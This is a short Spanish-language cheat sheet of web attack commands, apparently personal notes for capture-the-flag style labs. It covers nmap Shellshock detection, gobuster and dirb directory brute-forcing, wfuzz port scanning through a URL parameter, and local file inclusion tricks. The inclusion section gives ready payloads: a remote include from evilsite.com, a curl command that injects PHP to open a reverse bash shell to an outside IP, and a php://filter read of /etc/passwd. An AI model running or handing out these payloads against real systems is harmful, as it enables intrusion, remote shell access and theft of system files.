Web Enumeration

Detectar CGI vulnerable a SHELLSHOCK

nmap 10.10.10.111 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi

Enumeración de directorios y ficheros

gobuster dir  -u http://10.10.10.111/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,cgi -t 50
dirb http://10.10.10.111/
dirb http://10.10.10.111/Proyecto_Final/ /usr/share/dirb/wordlists/spanish.txt

Trucos para LFI

Including Remote Code:
?file=[file|http|https|ftp]://evilsite.com/shell.txt

Using PHP stream php://input:
Specify your payload in the POST parameters
?file=php://input
curl -s --data "<?system('/bin/bash -i >& /dev/tcp/192.168.119.212/443 0>&1');?>" "http://10.10.10.111/internal/advanced_comment_system/admin.php?ACS_path=php://input%00"

Using PHP stream php://filter:
?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd

wfuzz -c -z range,1-65535 --hl=2 http://10.10.10.111:6000/url.php?path=localhost:FUZZ

Generar certificados cliente intermediate para el navegador PKCS12

Última actualización